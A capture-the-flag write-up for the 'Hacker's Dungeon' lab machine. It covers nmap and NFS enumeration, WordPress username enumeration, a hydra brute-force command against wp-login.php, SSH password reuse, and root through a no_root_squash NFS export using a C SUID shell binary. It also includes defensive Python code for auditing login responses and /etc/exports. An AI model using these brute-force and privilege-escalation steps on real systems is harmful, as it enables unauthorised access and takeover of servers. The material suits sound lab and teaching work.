
Hacker's Dungeon Machine Write up

Hacker’s Dungeon

IP: 10.0.0.133

Enumeration

We start by scanning the machine with nmap.

First, discover all open ports with a full port sweep.

Then check what exactly is running on those ports with a service and version scan. Three findings drive the rest of the write-up: rpcbind on port 111 with NFS on port 2049, a web server on port 80 whose robots.txt disallows /wp-admin, and SSH for later.

Foothold

Ports 111 and 2049

Check HackTricks for pentesting rpcbind and NFS.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind#rpcbind-+-nfs

https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting#enumeration

List the NFS exports:

nmap --script="nfs-showmount" 10.0.0.133

There is one export, /dungeon.

Mount it:

mkdir /tmp/mount
sudo mount -t nfs 10.0.0.133:/dungeon /tmp/mount -o nolock

Nothing interesting in the share for now, but keep the mount: the same export becomes the privilege escalation path later.

Port 80

Our nmap scan showed that robots.txt has one disallowed directory, wp-admin, which indicates that WordPress is running on port 80.

Visiting the site, we learn the WordPress and Apache versions; this might be helpful later, but let us look around more.

Nothing on the front page seems interesting.

Clicking on the post's date opens it, and we notice that the post was written by the user kasi.

We can confirm that the user kasi exists by trying to log in on wp-login.php with any random password and reading the error message: WordPress tells us the password entered for the username kasi is incorrect.

A different error message (unknown username) is shown if we try a random username and password such as test:test. That difference is a username enumeration oracle.

We try to brute-force kasi's password with hydra:

hydra -l kasi -P /usr/share/wordlists/rockyou.txt 10.0.0.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect"

The failure condition F=incorrect matches the "password you entered for the username ... is incorrect" message WordPress returns for an existing account, so hydra reports the first response that lacks it as a hit. This only works because we already know kasi is valid: the unknown-username message does not contain "incorrect", so spraying a list of guessed usernames with this condition would report every non-existent user as a success (matching on the login_error element instead avoids that).

We get the user's password: dogcat.
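Added example, not part of the original write-up: a small Python model of the enumeration oracle described above and of hydra's F=&lt;string&gt; rule. The response fragments are constructed from WordPress's standard error strings rather than captured from the target; the cookie header and the usernames other than kasi are assumptions for illustration.

```python
import re

# Constructed wp-login.php response fragments, modelled on WordPress's standard
# error strings; they were not captured from the target in this write-up.
RESP_UNKNOWN_USER = (
    '<div id="login_error">\t<strong>Error</strong>: Unknown username. '
    'Check again or try your email address.<br />\n</div>'
)
RESP_WRONG_PASSWORD = (
    '<div id="login_error">\t<strong>Error</strong>: The password you entered for '
    'the username <strong>kasi</strong> is incorrect. '
    '<a href="/wp-login.php?action=lostpassword">Lost your password?</a><br />\n</div>'
)
# A successful login is a redirect to wp-admin that sets a wordpress_logged_in_* cookie
# (cookie value is a made-up placeholder).
HEADERS_SUCCESS = {"Set-Cookie": "wordpress_logged_in_4f3a=kasi%7C1700000000%7Cabc; path=/; HttpOnly"}


def classify_login(body: str, headers: dict) -> str:
    """Classify one POST to wp-login.php: success / unknown_user / wrong_password / other."""
    if "wordpress_logged_in" in headers.get("Set-Cookie", ""):
        return "success"
    m = re.search(r'<div id="login_error">(.*?)</div>', body, re.S)
    if not m:
        return "other"
    err = m.group(1)
    if re.search(r"Unknown username|Invalid username", err):
        return "unknown_user"
    if "is incorrect" in err:
        return "wrong_password"  # WordPress only says this for an existing account
    return "other"


def valid_users(responses: dict) -> list:
    """responses maps username -> (body, headers) of one login attempt with a junk
    password. Usernames that drew the 'password is incorrect' message exist."""
    return sorted(u for u, (body, hdrs) in responses.items()
                  if classify_login(body, hdrs) == "wrong_password")


def hydra_counts_as_success(body: str, failure_string: str) -> bool:
    """Mirror hydra's http-form-post F=<string> rule: any response that does not
    contain the failure string is reported as a valid login."""
    return failure_string not in body


# Constructed enumeration run: three guessed usernames, each tried with password "test".
SAMPLE_RUN = {
    "admin": (RESP_UNKNOWN_USER, {}),
    "kasi": (RESP_WRONG_PASSWORD, {}),
    "test": (RESP_UNKNOWN_USER, {}),
}

if __name__ == "__main__":
    print("existing users:", valid_users(SAMPLE_RUN))
    for name, (body, _) in SAMPLE_RUN.items():
        print(name,
              "F=incorrect ->", "HIT" if hydra_counts_as_success(body, "incorrect") else "fail",
              "| F=login_error ->", "HIT" if hydra_counts_as_success(body, "login_error") else "fail")
```

Running it shows why F=incorrect is fine for a single known user but a trap for username spraying: both unknown-username responses count as hits under F=incorrect, while F=login_error correctly marks all three as failures.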

After logging in we land on the user's profile page; there is nothing interesting there.

Looking around the dashboard we find that we are a normal (non-administrator) user, so we cannot do much from here: no theme or plugin editing, hence no easy code execution through WordPress itself.

Let us try to log in with the same credentials over SSH; there is a good chance the password is reused.

And we are in!

The user.txt flag is in the user's home directory.

Privilege Escalation

Running sudo -l shows what the user kasi is allowed to run with sudo.

Start a Python simple web server on the attacking machine to host linpeas.sh, then fetch it from the target:

python3 -m http.server 80

The linpeas result to follow up is the NFS export of /dungeon and its root_squash setting.

What is root_squash?

By default, the NFS server maps requests coming from the client's root user (UID 0) to an anonymous, unprivileged ID (root_squash). This stops root on one machine from automatically owning files as root on another, which matters when the server hosts root filesystems, for example for diskless clients. The option no_root_squash turns that mapping off: the client's root can both read and create files on the NFS server as root, including root-owned files with the SUID bit set. It should be used sparingly, for selected trusted hosts only, and never without understanding the consequences.

The /dungeon export on this machine has no_root_squash enabled, and that is the vulnerability we exploit: root on our attacking machine can write a root-owned SUID binary into the share, and kasi can then execute it on the target.
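Added example, not from the original write-up or from the machine itself: a Python parser and audit for /etc/exports that flags every export carrying no_root_squash, rated by whether the share is writable and whether the client list is a wildcard. The exports file is constructed for the example; its first line reproduces the condition the write-up exploits, the remaining lines are assumptions added to show the other cases.

```python
import re
from dataclasses import dataclass, field

# Constructed /etc/exports written for this example; it is not the target's file.
# The first line reproduces the condition exploited in the write-up.
SAMPLE_EXPORTS = """\
# NFS exports
/dungeon    *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup 10.0.0.0/24(rw,sync,no_root_squash)   # admin hosts only
/srv/share  10.0.0.0/24(rw,sync,no_subtree_check)
/srv/pub    (ro,insecure,all_squash)
"""


@dataclass
class Export:
    path: str
    client: str                      # host, netgroup, wildcard or CIDR; "*" if none given
    options: list = field(default_factory=list)


def parse_exports(text: str) -> list:
    """Parse exports(5) syntax: '<path> <client>(<opt,...>) [<client>(<opts>) ...]'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]
        for spec in specs:
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", spec)
            host = m.group(1) or "*"            # '(opts)' with no host applies to every client
            opts = [o for o in (m.group(2) or "").split(",") if o]
            exports.append(Export(path, host, opts))
    return exports


def audit_exports(text: str) -> list:
    """Flag exports where a client's root keeps UID 0 on the server.
    root_squash is the NFS default, so only an explicit no_root_squash is a finding."""
    findings = []
    for e in parse_exports(text):
        opts = set(e.options)
        if "no_root_squash" not in opts:
            continue
        writable = "rw" in opts
        if e.client == "*":
            sev = "CRITICAL" if writable else "HIGH"
        else:
            sev = "HIGH" if writable else "MEDIUM"
        detail = "no_root_squash: root on {} is root on this share".format(e.client)
        if writable:
            detail += "; a root-owned SUID binary dropped here runs as root on the server"
        findings.append({"path": e.path, "client": e.client,
                         "severity": sev, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f["severity"], f["path"], f["client"], "-", f["detail"])
```

Only the two exports with an explicit no_root_squash are reported; /srv/share inherits the default root_squash and /srv/pub uses all_squash, so neither lets a client's root become root on the server.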

We need a binary that sets our user ID to 0 and gives us a shell as root.

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setreuid() */

int main(void) {
    /* Started from a root-owned SUID file, so euid is already 0; set ruid
       to 0 as well, otherwise bash drops privileges when euid != ruid. */
    setreuid(0, 0);
    system("/bin/bash");
    return 0;
}

Compile it with gcc (if the target's architecture or libc differs from the attacking machine's, build it statically so it runs there):

gcc test.c -o test

As the root user on the attacking machine, copy the binary test into the mounted directory and set the SUID bit on it. Because the export has no_root_squash, the file lands on the server owned by root, with the SUID bit intact.

Back on the target machine, the binary is waiting in /dungeon; running it as kasi gives a root shell.

The root.txt flag is in the root user's home directory.

This post is licensed under CC BY 4.0 by the author.